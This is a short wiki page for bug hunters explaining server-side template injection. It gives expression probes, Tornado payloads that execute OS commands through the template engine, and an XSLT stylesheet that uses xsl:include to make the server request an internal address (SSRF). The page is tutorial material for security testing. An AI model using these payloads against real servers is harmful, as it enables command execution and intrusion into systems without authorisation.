Bug Culture Wiki
Pages (Latest 3 updated) : Menu (Edit):
Add new Edit Delete History Source
Contents:
  1. Server-Side Template Injection (SSTI)
    1. Introduction
    2. Submitting Payloads
      1. Tornado Payloads
      2. Tools
    3. Attacking XSLT
      1. SSRF with xsl:include
      2. Wordlist for XSLT
    4. References

Server-Side Template Injection (SSTI)

Introduction

Template engines read tokenized strings from template documents and produce rendered strings with actual values in the output document. These templates are commonly used by web developers to generate dynamic content. Server-Side Template Injection (SSTI) occurs when user input is insecurely merged with a server-side template, allowing an attacker to inject malicious directives.

Submitting Payloads

One way to detect SSTI is by submitting mathematical expressions or template syntax and observing if they are evaluated by the server. Below are some example payloads:


${7*7}
$

If the server responds with an evaluated result (e.g., 49), this indicates a potential SSTI vulnerability. Note that in some cases, evaluating expressions in the template engine can also lead to XSS if the output is re-injected into a web page without proper sanitization.

Tornado Payloads

For Tornado (a Python web framework) and similar engines, you can often call Python built-in functions or modules:

{% import os %}{{ os.popen("whoami").read() }}
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}

These payloads demonstrate how an attacker can execute OS commands (e.g., whoami, id) through the template engine.

Tools

tplmap.py can help automate:

  1. Identifying which template engine is in use.
  2. Injecting and exploiting the template vulnerability.

Attacking XSLT

Extensible Stylesheet Language Transformations (XSLT) is an XML-based language often used to transform XML documents into HTML, other XML documents, or PDFs. XSLT Server-Side Injection can occur when:

  • Arbitrary XSLT files can be uploaded.
  • The application generates an XSL Transformationโ€™s XML document dynamically using unvalidated user input.

SSRF with xsl:include

When you control the transformation, you can include external resources to perform Server-Side Request Forgery (SSRF). For example:

<!-- ssrf.xsl -->
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
                xmlns:abc="http://php.net/xsl"
                version="1.0">
    <xsl:include href="http://127.0.0.1:5000/xslt"/>
    <xsl:template match="/">
    </xsl:template>
</xsl:stylesheet>

By specifying a resource on 127.0.0.1, you might force the server to load or disclose internal services/data, effectively mounting an SSRF attack.

Wordlist for XSLT

You can also use the following wordlist to brute-force functionality available in the target application:

https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xslt.txt

References